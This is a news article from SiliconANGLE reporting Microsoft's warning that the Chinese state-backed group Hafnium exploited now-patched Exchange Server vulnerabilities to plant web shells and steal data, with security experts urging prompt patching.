SECURITY
SECURITY
SECURITY
Microsoft warns that Chinese hackers are targeting vulnerabilities in Exchange Server
Microsoft Corp. issued a warning today that a new Chinese state-sponsored hacking group is targeting on-premises versions of Microsoft Exchange Server using a number of recently identified and now patched vulnerabilities.
The hacking group, dubbed “Hafnium” by the Microsoft Threat Intelligence Center, is described as “highly skilled and sophisticated.” It’s specifically attempting to steal information from U.S. targets, including universities, defense contractors, law firms and infectious-disease researchers.
The vulnerabilities and the exploitation of them were first identified by researchers at cybersecurity firm Volexity Inc. in early January. The vulnerabilities, collectively zero-day or previously unrecognized exploits include a server-side request forgery vulnerability, an insecure deserialization vulnerability in the Unified Messaging Service and two post-authentication arbitrary file write vulnerabilities.
Hafnium exploited the vulnerabilities to trick targeted Exchange servers into allowing it access. The Chinese hackers then created a web shell to control the compromised server remotely, using that access to steal data from the organization’s network.
While Microsoft has released a patch for the vulnerabilities, the concern is that Exchange users will not promptly install the updates. “Even though we’ve worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems,” Tom Burt, corporate vice president, customer security and trust at Microsoft, wrote in a blog post. “Promptly applying today’s patches in the best protection against this attack.”
Satnam Narang, staff research engineer at cybersecurity company Tenable Inc., told SiliconANGLE that the fact that Microsoft chose to patch these flaws early rather than include them as part of next week’s Patch Tuesday release indicates the flaws are quite severe.
“While Microsoft says that Hafnium primarily targets entities within the United States, other researchers say they have seen these vulnerabilities being exploited by different threat actors targeting other regions,” Narang said. “We expect other threat actors to begin leveraging these vulnerabilities in the coming days and weeks, which is why it is critically important for organizations that use Exchange Server to apply these patches immediately.”
Image: Microsoft
A message from John Furrier, co-founder of SiliconANGLE:
Support our open free content by sharing and engaging with our content and community.
Join theCUBE Alumni Trust Network
Where Technology Leaders Connect, Share Intelligence & Create Opportunities
11.4k+
CUBE Alumni Network
C-level and Technical
Domain Experts
15M+
theCUBE
Viewers
Connect with 11,413+ industry leaders from our network of tech and business leaders forming a unique trusted network effect.
SiliconANGLE Media is a recognized leader in digital media innovation serving innovative audiences and brands, bringing together cutting-edge technology, influential content, strategic insights and real-time audience engagement. As the parent company of SiliconANGLE, theCUBE Network, theCUBE Research, CUBE365, theCUBE AI and theCUBE SuperStudios — such as those established in Silicon Valley and the New York Stock Exchange (NYSE) — SiliconANGLE Media operates at the intersection of media, technology, and AI. .
Founded by tech visionaries John Furrier and Dave Vellante, SiliconANGLE Media has built a powerful ecosystem of industry-leading digital media brands, with a reach of 15+ million elite tech professionals. The company’s new, proprietary theCUBE AI Video cloud is breaking ground in audience interaction, leveraging theCUBEai.com neural network to help technology companies make data-driven decisions and stay at the forefront of industry conversations.
